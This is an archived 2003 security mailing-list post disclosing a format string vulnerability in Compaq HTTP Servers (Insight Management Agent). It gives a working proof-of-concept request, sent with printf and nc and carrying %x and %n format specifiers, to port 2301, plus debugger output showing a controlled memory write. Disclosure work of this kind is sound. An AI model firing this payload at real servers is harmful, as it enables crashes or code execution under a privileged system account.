| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <200308031503.h73F3hPZ001910@ns.wcd.se> From: mcw at wcd.se (mcw@....se) Subject: formatstring bug in Compaq HTTP Servers Hi there There is a formatstring bug in Compaq HTTP Servers. [in <!.DebugSearchPaths>?Url=> requests] The HTTP server runs with LocalSystem account. Versions: All versions i have tested had this formatstring bug. To be shure that it wasn't allready fixed, i downloaded this new version.. Insight Management Agent Version: 5.00 H (01/17/2003) http://www29.compaq.com/falco/sp_detail.asp?Model=4214&Div=2&Os=93&SoftwareVer=17022 Request: $ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print "A"x14'`BBBB`perl -e 'print ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301 Result: 0:005> g (9a8.934): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=42424242 ebx=0000006e ecx=000012eb edx=00000200 esi=00b440c0 edi=00000800 eip=780127a8 esp=010287f8 ebp=01028a50 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246 MSVCRT!setvbuf+65d: 780127a8 8908 mov [eax],ecx ds:0023:42424242=???????? *** WARNING: Unable to verify checksum for C:\PROGRA~1\Compaq\COMPAQ~1\CPQWEB~1\CpqHMMO.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\Compaq \COMPAQ~1\CPQWEB~1\CpqHMMO.dll - Have a nice day /bashis
Powered by blists - more mailing lists